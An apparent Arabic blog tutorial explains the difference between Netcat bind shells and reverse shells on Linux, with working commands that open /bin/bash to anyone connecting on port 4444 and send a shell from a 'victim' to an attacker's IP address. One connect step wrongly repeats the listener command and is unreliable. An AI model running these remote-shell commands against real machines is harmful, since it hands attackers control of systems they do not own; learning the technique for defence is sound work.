recent
أخبار ساخنة

إجراء إتصال عكسي بإستخدام أداة Netcat على لينكس و الفرق بين Bind Shell و Reverse Shell

Netcat remote shell

Netcat Remote Shell

قبل إستخدام أداة netcat في الإتصال العكسي على shell يجب علينا في البداية معرفة ما هو shell.

ما هو الشيل shell

الشيل shell يُمكن وصفهُ على أنه مجموعة من الأكواد البرمجية التي يٌمكن إستخدامها في تنفيذ الأوامر على بعض الأجهزة المُختلفة سواء داخل الشبكة أو خارج الشبكة, و هناك نوعين نستطيع من خلالهما الحصول على إتصال عكسي بين 2 machine و هم bind shell أو reverse shell و كل نوع من تلك الأنواع لهٌ طرق الإتصال المٌختلفة, لنتعرف على كل واحد منهم و ما الإختلاف بينهم و سنقوم بإستخدام أداة netcat.

Netcat Bind Shell

netcat bind shell

يُعتبَر هذا نوع من أنواع shell الذي يقوم من خلاله الجهاز المستهدف أو الضحية بفتح port أو منفذ خاص للتنصت و ينتظر الإتصال الخارجي من أي جهاز آخر بحيث يقوم المُخترق بالإتصال على machine من خلال المنفذ و بإعتبار أنه يٌمكن التنصت يٌمكن أيضاً تشغيل البرامج التنفيذية في الحاسوب مثل cmd.exe في نظام windows و ايضاً bin/bash في نظام linux, الأمر أصبح مفهوماً bind shell يجب أن يكون الضحية في وضع التنصت listening و يقوم المُخترق بالإتصال عليه.

nc -nlvp 4444 -e /bin/bash


قُمنا بإستخدام أداة netcat في عمل تنصت على هذا المنفَذ مع إضافة تشغيل bin/bash المتحكم في نظام linux, و معنى هذا أي شخص يقوم بالإتصال على machine من خلال هذا المنفذ 4444 ستقوم بتشغيل الملف التنفيذي bin/bash.

nc -nlvp 4444 -e /bin/bash


قُمنا هنا بالإتصال على machine من جهاز آخر و يُمكننا الآن تنفيذ أوامر bash على الحاسوب, يختلف الأمر في نظام windows علينا تغيير bin/bash بـ cmd.exe

netcat bind shell

Netcat Reverse Shell

netcat reverse shell

هذا النوع من الـ Shell يعكس حالة Bind shell و هنا يقوم الـ Hacker الذي يقوم بعمل وضع التنصت و الضحية هي التي سوف تقوم بالإتصال عليه, تحدث تلك الحالة كثيراً في إنشاء Payloads أو Trojans بشكل عام و اكثر الأدوات المستخدمة هي metasploit حيث تقوم بإنشاء payload الخاص بك لكن عند إرسال payload تقوم بتشغيل وضع التنصت داخل metasploit هذا هو Reverse Shell, الـ Hacker هو الذي يقوم بوضع التنصت و الضحية تقوم بالإتصال عليه و سنقوم الآن بإستخدام Netcat.

nc -nlvp 4444


هنا قُمنا بالتنصت على هذا المنفذ في جهاز الـ Hacker

nc -nv 192.168.1.9 4444 -e /bin/bash


قُمنا بالإتصال على الجهاز ip address الخاص به 192.168.1.9 بالإضافة لتشغيل bin/bash المُتحكم في نظام linux و يختلف الأمر في نظام windows و سيكون الملف التنفيذي هو cmd.exe و نستطيع الآن تنفيذ أوامر bash.

Netcat Reverse Shell

لتعرف علي اداه Netcat اضغط هنا.
تحميل كتابة Netcat والتعمق أكثر في Bind Shell And Reverse Shell 
google-playkhamsatmostaqltradent